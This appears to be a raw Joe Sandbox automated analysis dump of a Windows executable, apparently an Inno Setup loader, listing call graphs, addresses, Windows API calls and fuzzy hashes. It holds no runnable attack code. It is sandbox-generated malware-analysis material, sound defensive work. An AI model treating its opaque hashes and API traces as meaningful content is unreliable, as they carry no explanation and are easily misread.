40170a 5790->5787 5825 401d80 5792->5825 5795 40132c LocalAlloc 5796 401df0 5795->5796 5798 401df8 5796->5798 5829 401b44 5796->5829 5798->5776 5800 40143f VirtualAlloc 5799->5800 5802 40146c 5800->5802 5803 40148f 5800->5803 5819 4012e4 5802->5819 5803->5785 5806 40147c VirtualFree 5806->5803 5809 40160a 5807->5809 5808 40163a 5808->5790 5809->5808 5810 401626 VirtualAlloc 5809->5810 5810->5808 5810->5809 5812 401348 5811->5812 5813 4012e4 LocalAlloc 5812->5813 5814 40138f 5813->5814 5814->5785 5818 40153b 5815->5818 5816 401594 5816->5787 5817 401568 VirtualFree 5817->5818 5818->5816 5818->5817 5822 40128c 5819->5822 5823 401298 LocalAlloc 5822->5823 5824 4012aa 5822->5824 5823->5824 5824->5803 5824->5806 5826 401d89 5825->5826 5828 401d92 5825->5828 5826->5828 5834 401b74 5826->5834 5828->5795 5830 401b61 5829->5830 5831 401b52 5829->5831 5830->5798 5832 401d00 9 API calls 5831->5832 5833 401b5f 5832->5833 5833->5798 5837 40215c 5834->5837 5836 401b95 5836->5828 5838 40217a 5837->5838 5839 402175 5837->5839 5841 4021ab RtlEnterCriticalSection 5838->5841 5842 40217e 5838->5842 5849 4021b5 5838->5849 5840 401918 4 API calls 5839->5840 5840->5838 5841->5849 5842->5836 5843 4021c1 5845 4022e3 RtlLeaveCriticalSection 5843->5845 5846 4022ed 5843->5846 5844 402244 5844->5842 5847 401d80 7 API calls 5844->5847 5845->5846 5846->5836 5847->5842 5848 402270 5848->5843 5850 401d00 7 API calls 5848->5850 5849->5843 5849->5844 5849->5848 5850->5843 5852 401c7a 5851->5852 5853 401c9d 5852->5853 5854 401caf 5852->5854 5864 40188c 5853->5864 5856 40188c 3 API calls 5854->5856 5857 401cad 5856->5857 5858 401b44 9 API calls 5857->5858 5863 401cc5 5857->5863 5859 401cd4 5858->5859 5860 401cee 5859->5860 5874 401b98 5859->5874 5879 4013a0 5860->5879 5863->5780 5865 4018b2 5864->5865 5873 40190b 5864->5873 5883 401658 5865->5883 5868 40132c LocalAlloc 5869 4018cf 5868->5869 5870 40150c VirtualFree 5869->5870 5871 4018e6 5869->5871 5870->5871 5872 4013a0 LocalAlloc 5871->5872 5871->5873 5872->5873 5873->5857 5875 401bab 5874->5875 5876 401b9d 5874->5876 5875->5860 5877 401b74 9 API calls 5876->5877 5878 401baa 5877->5878 5878->5860 5881 4013ab 5879->5881 5880 4013c6 5880->5863 5881->5880 5882 4012e4 LocalAlloc 5881->5882 5882->5880 5885 40168f 5883->5885 5884 4016cf 5884->5868 5885->5884 5886 4016a9 VirtualFree 5885->5886 5886->5885 6843 402dfa 6844 402e0d 6843->6844 6846 402e26 6843->6846 6847 402ba4 6844->6847 6848 402bc9 6847->6848 6849 402bad 6847->6849 6848->6846 6850 402bb5 RaiseException 6849->6850 6850->6848 6851 4075fa GetFileSize 6852 407626 6851->6852 6853 407616 GetLastError 6851->6853 6853->6852 6854 40761f 6853->6854 6855 40748c 35 API calls 6854->6855 6855->6852 6856 406ffb 6857 407008 SetErrorMode 6856->6857 6525 403a80 CloseHandle 6526 403a90 6525->6526 6527 403a91 GetLastError 6525->6527 6528 404283 6529 4042c3 6528->6529 6530 403154 4 API calls 6529->6530 6531 404323 6530->6531 6858 404185 6859 4041ff 6858->6859 6860 4041cc 6859->6860 6861 403154 4 API calls 6859->6861 6862 404323 6861->6862 6532 403e87 6533 403e4c 6532->6533 6534 403e62 6533->6534 6535 403e7b 6533->6535 6538 403e67 6533->6538 6541 403cc8 6534->6541 6537 402674 4 API calls 6535->6537 6539 403e78 6537->6539 6538->6539 6545 402674 6538->6545 6542 403cd6 6541->6542 6543 402674 4 API calls 6542->6543 6544 403ceb 6542->6544 6543->6544 6544->6538 6546 403154 4 API calls 6545->6546 6547 40267a 6546->6547 6547->6539 6556 407e90 6557 407eb8 VirtualFree 6556->6557 6558 407e9d 6557->6558 6561 403e95 6562 403e4c 6561->6562 6563 403e67 6562->6563 6564 403e62 6562->6564 6565 403e7b 6562->6565 6568 403e78 6563->6568 6569 402674 4 API calls 6563->6569 6566 403cc8 4 API calls 6564->6566 6567 402674 4 API calls 6565->6567 6566->6563 6567->6568 6569->6568 6570 40ac97 6579 4096fc 6570->6579 6573 402f24 5 API calls 6574 40aca1 6573->6574 6575 403198 4 API calls 6574->6575 6576 40acc0 6575->6576 6577 403198 4 API calls 6576->6577 6578 40acc8 6577->6578 6588 4056ac 6579->6588 6581 409717 6582 409745 6581->6582 6594 40720c 6581->6594 6585 403198 4 API calls 6582->6585 6584 409735 6587 40973d MessageBoxA 6584->6587 6586 40975a 6585->6586 6586->6573 6586->6574 6587->6582 6589 403154 4 API calls 6588->6589 6590 4056b1 6589->6590 6591 4056c9 6590->6591 6592 403154 4 API calls 6590->6592 6591->6581 6593 4056bf 6592->6593 6593->6581 6595 4056ac 4 API calls 6594->6595 6596 40721b 6595->6596 6597 407221 6596->6597 6598 40722f 6596->6598 6599 40322c 4 API calls 6597->6599 6601 40724b 6598->6601 6602 40723f 6598->6602 6600 40722d 6599->6600 6600->6584 6612 4032b8 6601->6612 6605 4071d0 6602->6605 6606 40322c 4 API calls 6605->6606 6607 4071df 6606->6607 6608 4071fc 6607->6608 6609 406950 CharPrevA 6607->6609 6608->6600 6610 4071eb 6609->6610 6610->6608 6611 4032fc 18 API calls 6610->6611 6611->6608 6613 403278 18 API calls 6612->6613 6614 4032c2 6613->6614 6614->6600 6615 403a97 6616 403aac 6615->6616 6617 403bbc GetStdHandle 6616->6617 6618 403b0e CreateFileA 6616->6618 6626 403ab2 6616->6626 6619 403c17 GetLastError 6617->6619 6632 403bba 6617->6632 6618->6619 6620 403b2c 6618->6620 6619->6626 6622 403b3b GetFileSize 6620->6622 6620->6632 6622->6619 6623 403b4e SetFilePointer 6622->6623 6623->6619 6628 403b6a ReadFile 6623->6628 6624 403be7 GetFileType 6625 403c02 CloseHandle 6624->6625 6624->6626 6625->6626 6628->6619 6629 403b8c 6628->6629 6630 403b9f SetFilePointer 6629->6630 6629->6632 6630->6619 6631 403bb0 SetEndOfFile 6630->6631 6631->6619 6631->6632 6632->6624 6632->6626 6637 40aaa2 6638 40aad2 6637->6638 6639 40aadc CreateWindowExA SetWindowLongA 6638->6639 6640 405194 33 API calls 6639->6640 6641 40ab5f 6640->6641 6642 4032fc 18 API calls 6641->6642 6643 40ab6d 6642->6643 6644 4032fc 18 API calls 6643->6644 6645 40ab7a 6644->6645 6646 406b7c 19 API calls 6645->6646 6647 40ab86 6646->6647 6648 4032fc 18 API calls 6647->6648 6649 40ab8f 6648->6649 6650 4099ec 43 API calls 6649->6650 6651 40aba1 6650->6651 6652 4098cc 19 API calls 6651->6652 6653 40abb4 6651->6653 6652->6653 6654 40abed 6653->6654 6655 4094d8 9 API calls 6653->6655 6656 40ac06 6654->6656 6659 40ac00 RemoveDirectoryA 6654->6659 6655->6654 6657 40ac1a 6656->6657 6658 40ac0f DestroyWindow 6656->6658 6660 40ac42 6657->6660 6661 40357c 4 API calls 6657->6661 6658->6657 6659->6656 6662 40ac38 6661->6662 6663 4025ac 4 API calls 6662->6663 6663->6660 6875 405ba2 6877 405ba4 6875->6877 6876 405be0 6880 405940 19 API calls 6876->6880 6877->6876 6878 405bf7 6877->6878 6879 405bda 6877->6879 6884 404cdc 19 API calls 6878->6884 6879->6876 6881 405c4c 6879->6881 6882 405bf3 6880->6882 6883 4059b0 33 API calls 6881->6883 6885 403198 4 API calls 6882->6885 6883->6882 6886 405c20 6884->6886 6887 405c86 6885->6887 6888 4059b0 33 API calls 6886->6888 6888->6882 6889 408da4 6890 408dc8 6889->6890 6891 408c80 18 API calls 6890->6891 6892 408dd1 6891->6892 6664 402caa 6665 403154 4 API calls 6664->6665 6666 402caf 6665->6666 6907 4011aa 6908 4011ac GetStdHandle 6907->6908 6667 4028ac 6668 402594 18 API calls 6667->6668 6669 4028b6 6668->6669 4979 40aab4 4980 40aab8 SetLastError 4979->4980 5011 409648 GetLastError 4980->5011 4983 40aad2 4985 40aadc CreateWindowExA SetWindowLongA 4983->4985 5024 405194 4985->5024 4989 40ab6d 4990 4032fc 18 API calls 4989->4990 4991 40ab7a 4990->4991 5041 406b7c GetCommandLineA 4991->5041 4994 4032fc 18 API calls 4995 40ab8f 4994->4995 5046 4099ec 4995->5046 4997 40aba1 4999 40abb4 4997->4999 5067 4098cc 4997->5067 5000 40abd4 4999->5000 5001 40abed 4999->5001 5073 4094d8 5000->5073 5003 40ac06 5001->5003 5006 40ac00 RemoveDirectoryA 5001->5006 5004 40ac1a 5003->5004 5005 40ac0f DestroyWindow 5003->5005 5007 40ac42 5004->5007 5081 40357c 5004->5081 5005->5004 5006->5003 5009 40ac38 5094 4025ac 5009->5094 5098 404c94 5011->5098 5019 4096c3 5113 4031b8 5019->5113 5025 4051a8 33 API calls 5024->5025 5026 4051a3 5025->5026 5027 4032fc 5026->5027 5028 403300 5027->5028 5029 40333f 5027->5029 5030 4031e8 5028->5030 5031 40330a 5028->5031 5029->4989 5037 403254 18 API calls 5030->5037 5038 4031fc 5030->5038 5032 403334 5031->5032 5033 40331d 5031->5033 5034 4034f0 18 API calls 5032->5034 5274 4034f0 5033->5274 5040 403322 5034->5040 5035 403228 5035->4989 5037->5038 5038->5035 5039 4025ac 4 API calls 5038->5039 5039->5035 5040->4989 5300 406af0 5041->5300 5043 406ba1 5044 403198 4 API calls 5043->5044 5045 406bbf 5044->5045 5045->4994 5314 4033b4 5046->5314 5048 409a27 5049 409a59 CreateProcessA 5048->5049 5050 409a65 5049->5050 5051 409a6c CloseHandle 5049->5051 5052 409648 35 API calls 5050->5052 5053 409a75 5051->5053 5052->5051 5054 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5053->5054 5055 409a7a MsgWaitForMultipleObjects 5054->5055 5055->5053 5056 409a91 5055->5056 5057 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5056->5057 5058 409a96 GetExitCodeProcess CloseHandle 5057->5058 5059 409ab6 5058->5059 5060 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5059->5060 5061 409abe 5060->5061 5061->4997 5062 402f24 5063 403154 4 API calls 5062->5063 5064 402f29 5063->5064 5320 402bcc 5064->5320 5066 402f51 5066->5066 5068 40990e 5067->5068 5069 4098d4 5067->5069 5068->4999 5069->5068 5070 403420 18 API calls 5069->5070 5071 409908 5070->5071 5323 408e80 5071->5323 5074 409532 5073->5074 5078 4094eb 5073->5078 5074->5001 5075 4094f3 Sleep 5075->5078 5076 409503 Sleep 5076->5078 5078->5074 5078->5075 5078->5076 5079 40951a GetLastError 5078->5079 5346 408fbc 5078->5346 5079->5074 5080 409524 GetLastError 5079->5080 5080->5074 5080->5078 5084 403591 5081->5084 5090 4035a0 5081->5090 5082 4035b1 5085 403198 4 API calls 5082->5085 5083 4035b8 5086 4031b8 4 API calls 5083->5086 5087 4035d0 5084->5087 5088 40359b 5084->5088 5089 4035b6 5084->5089 5085->5089 5086->5089 5087->5089 5092 40357c 4 API calls 5087->5092 5088->5090 5091 4035ec 5088->5091 5089->5009 5090->5082 5090->5083 5091->5089 5363 403554 5091->5363 5092->5087 5095 4025b0 5094->5095 5096 4025ba 5094->5096 5095->5096 5097 403154 4 API calls 5095->5097 5096->5007 5096->5096 5097->5096 5121 4051a8 5098->5121 5101 407284 FormatMessageA 5102 4072aa 5101->5102 5103 403278 18 API calls 5102->5103 5104 4072c7 5103->5104 5105 408da8 5104->5105 5106 408dc8 5105->5106 5264 408c80 5106->5264 5109 405890 5110 405897 5109->5110 5111 4031e8 18 API calls 5110->5111 5112 4058af 5111->5112 5112->5019 5115 4031be 5113->5115 5114 4031e3 5117 403198 5114->5117 5115->5114 5116 4025ac 4 API calls 5115->5116 5116->5115 5118 4031b7 5117->5118 5119 40319e 5117->5119 5118->4983 5118->5062 5119->5118 5120 4025ac 4 API calls 5119->5120 5120->5118 5122 4051c5 5121->5122 5129 404e58 5122->5129 5125 4051f1 5134 403278 5125->5134 5132 404e73 5129->5132 5130 404e85 5130->5125 5139 404be4 5130->5139 5132->5130 5142 404f7a 5132->5142 5149 404e4c 5132->5149 5135 403254 18 API calls 5134->5135 5136 403288 5135->5136 5137 403198 4 API calls 5136->5137 5138 4032a0 5137->5138 5138->5101 5256 405940 5139->5256 5141 404bf5 5141->5125 5143 404f8b 5142->5143 5147 404fd9 5142->5147 5146 40505f 5143->5146 5143->5147 5145 404ff7 5145->5132 5146->5145 5156 404e38 5146->5156 5147->5145 5152 404df4 5147->5152 5150 403198 4 API calls 5149->5150 5151 404e56 5150->5151 5151->5132 5153 404e02 5152->5153 5159 404bfc 5153->5159 5155 404e30 5155->5147 5186 4039a4 5156->5186 5162 4059b0 5159->5162 5161 404c15 5161->5155 5163 4059be 5162->5163 5172 404cdc LoadStringA 5163->5172 5166 405194 33 API calls 5167 4059f6 5166->5167 5175 4031e8 5167->5175 5170 4031b8 4 API calls 5171 405a1b 5170->5171 5171->5161 5173 403278 18 API calls 5172->5173 5174 404d09 5173->5174 5174->5166 5176 4031ec 5175->5176 5179 4031fc 5175->5179 5176->5179 5181 403254 5176->5181 5177 403228 5177->5170 5179->5177 5180 4025ac 4 API calls 5179->5180 5180->5177 5182 403274 5181->5182 5183 403258 5181->5183 5182->5179 5184 402594 18 API calls 5183->5184 5185 403261 5184->5185 5185->5179 5187 4039ab 5186->5187 5192 4038b4 5187->5192 5189 4039cb 5190 403198 4 API calls 5189->5190 5191 4039d2 5190->5191 5191->5145 5193 4038d5 5192->5193 5194 4038c8 5192->5194 5196 403934 5193->5196 5197 4038db 5193->5197 5220 403780 5194->5220 5198 403993 5196->5198 5199 40393b 5196->5199 5200 4038e1 5197->5200 5201 4038ee 5197->5201 5202 4037f4 3 API calls 5198->5202 5203 403941 5199->5203 5204 40394b 5199->5204 5227 403894 5200->5227 5206 403894 6 API calls 5201->5206 5209 4038d0 5202->5209 5242 403864 5203->5242 5208 4037f4 3 API calls 5204->5208 5210 4038fc 5206->5210 5211 40395d 5208->5211 5209->5189 5232 4037f4 5210->5232 5214 403864 23 API calls 5211->5214 5213 403917 5238 40374c 5213->5238 5215 403976 5214->5215 5218 40374c VariantClear 5215->5218 5217 40392c 5217->5189 5219 40398b 5218->5219 5219->5189 5221 4037f0 5220->5221 5223 403744 5220->5223 5221->5209 5222 403793 VariantClear 5222->5223 5223->5220 5223->5222 5224 4037ab 5223->5224 5225 403198 4 API calls 5223->5225 5226 4037dc VariantCopyInd 5223->5226 5224->5209 5225->5223 5226->5221 5226->5223 5247 4036b8 5227->5247 5230 40374c VariantClear 5231 4038a9 5230->5231 5231->5209 5233 403845 VariantChangeTypeEx 5232->5233 5234 40380a VariantChangeTypeEx 5232->5234 5237 403832 5233->5237 5235 403826 5234->5235 5236 40374c VariantClear 5235->5236 5236->5237 5237->5213 5239 403759 5238->5239 5240 403766 5238->5240 5239->5240 5241 403779 VariantClear 5239->5241 5240->5217 5241->5217 5253 40369c SysStringLen 5242->5253 5245 40374c VariantClear 5246 403882 5245->5246 5246->5209 5248 4036cb 5247->5248 5249 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5248->5249 5250 4036db 5248->5250 5251 40372e 5249->5251 5252 4036ed MultiByteToWideChar SysAllocStringLen 5250->5252 5251->5230 5252->5251 5254 403610 21 API calls 5253->5254 5255 4036b3 5254->5255 5255->5245 5257 40594c 5256->5257 5258 404cdc 19 API calls 5257->5258 5259 405972 5258->5259 5260 4031e8 18 API calls 5259->5260 5261 40597d 5260->5261 5262 403198 4 API calls 5261->5262 5263 405992 5262->5263 5263->5141 5265 403198 4 API calls 5264->5265 5267 408cb1 5264->5267 5265->5267 5266 4031b8 4 API calls 5268 408d69 5266->5268 5269 408cc8 5267->5269 5270 403278 18 API calls 5267->5270 5272 408cdc 5267->5272 5273 4032fc 18 API calls 5267->5273 5268->5109 5271 4032fc 18 API calls 5269->5271 5270->5267 5271->5272 5272->5266 5273->5267 5275 4034fd 5274->5275 5282 40352d 5274->5282 5277 403526 5275->5277 5280 403509 5275->5280 5276 403198 4 API calls 5279 403517 5276->5279 5278 403254 18 API calls 5277->5278 5278->5282 5279->5040 5283 4025c4 5280->5283 5282->5276 5285 4025ca 5283->5285 5284 4025dc 5284->5279 5284->5284 5285->5284 5287 403154 5285->5287 5288 403164 5287->5288 5289 40318c TlsGetValue 5287->5289 5288->5284 5290 403196 5289->5290 5291 40316f 5289->5291 5290->5284 5295 40310c 5291->5295 5293 403174 TlsGetValue 5294 403184 5293->5294 5294->5284 5296 403120 LocalAlloc 5295->5296 5297 403116 5295->5297 5298 40313e TlsSetValue 5296->5298 5299 403132 5296->5299 5297->5296 5298->5299 5299->5293 5301 406b1c 5300->5301 5302 403278 18 API calls 5301->5302 5303 406b29 5302->5303 5310 403420 5303->5310 5305 406b31 5306 4031e8 18 API calls 5305->5306 5307 406b49 5306->5307 5308 403198 4 API calls 5307->5308 5309 406b6b 5308->5309 5309->5043 5311 403426 5310->5311 5313 403437 5310->5313 5312 403254 18 API calls 5311->5312 5311->5313 5312->5313 5313->5305 5315 4033bc 5314->5315 5316 403254 18 API calls 5315->5316 5317 4033cf 5316->5317 5318 4031e8 18 API calls 5317->5318 5319 4033f7 5318->5319 5321 402bd5 RaiseException 5320->5321 5322 402be6 5320->5322 5321->5322 5322->5066 5324 408e8e 5323->5324 5326 408ea6 5324->5326 5336 408e18 5324->5336 5327 408e18 18 API calls 5326->5327 5328 408eca 5326->5328 5327->5328 5339 407918 5328->5339 5330 408ee5 5331 408e18 18 API calls 5330->5331 5333 408ef8 5330->5333 5331->5333 5332 408e18 18 API calls 5332->5333 5333->5332 5334 403278 18 API calls 5333->5334 5335 408f27 5333->5335 5334->5333 5335->5068 5337 405890 18 API calls 5336->5337 5338 408e29 5337->5338 5338->5326 5342 4078c4 5339->5342 5343 4078d6 5342->5343 5344 4078e7 5342->5344 5345 4078db InterlockedExchange 5343->5345 5344->5330 5345->5344 5354 408f70 5346->5354 5348 408fd2 5349 408fd6 5348->5349 5350 408ff2 DeleteFileA GetLastError 5348->5350 5349->5078 5351 409010 5350->5351 5360 408fac 5351->5360 5355 408f7a 5354->5355 5356 408f7e 5354->5356 5355->5348 5357 408fa0 SetLastError 5356->5357 5358 408f87 Wow64DisableWow64FsRedirection 5356->5358 5359 408f9b 5357->5359 5358->5359 5359->5348 5361 408fb1 Wow64RevertWow64FsRedirection 5360->5361 5362 408fbb 5360->5362 5361->5362 5362->5078 5364 403566 5363->5364 5366 403578 5364->5366 5367 403604 5364->5367 5366->5091 5368 40357c 5367->5368 5373 40359b 5368->5373 5374 4035b6 5368->5374 5375 4035d0 5368->5375 5376 4035a0 5368->5376 5369 4035b1 5371 403198 4 API calls 5369->5371 5370 4035b8 5372 4031b8 4 API calls 5370->5372 5371->5374 5372->5374 5373->5376 5377 4035ec 5373->5377 5374->5364 5375->5374 5378 40357c 4 API calls 5375->5378 5376->5369 5376->5370 5377->5374 5379 403554 4 API calls 5377->5379 5378->5375 5379->5377 6670 401ab9 6671 401a96 6670->6671 6672 401aa9 RtlDeleteCriticalSection 6671->6672 6673 401a9f RtlLeaveCriticalSection 6671->6673 6673->6672

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 134 409bfb-409c08 VirtualProtect 132->134 134->121
                                                                                                                                        APIs
                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                                                                        • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                                                                        • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2441996862-0
                                                                                                                                        • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                                                        • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                                                                        • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                                                        • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                        • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                                                        • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                                                                        • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                                                        • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                                                        • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                        • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                        • API String ID: 3256987805-3653653586
                                                                                                                                        • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                        • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                                                        • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                        • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                                                                          • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020724E0), ref: 0040966C
                                                                                                                                        • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                                                        • SetWindowLongA.USER32(00010438,000000FC,00409960), ref: 0040AB15
                                                                                                                                        • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                                                        • DestroyWindow.USER32(00010438,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                                                                        • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                        • API String ID: 3757039580-3001827809
                                                                                                                                        • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                                                        • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                                                                        • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                                                        • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                        • API String ID: 1646373207-2130885113
                                                                                                                                        • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                                                        • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
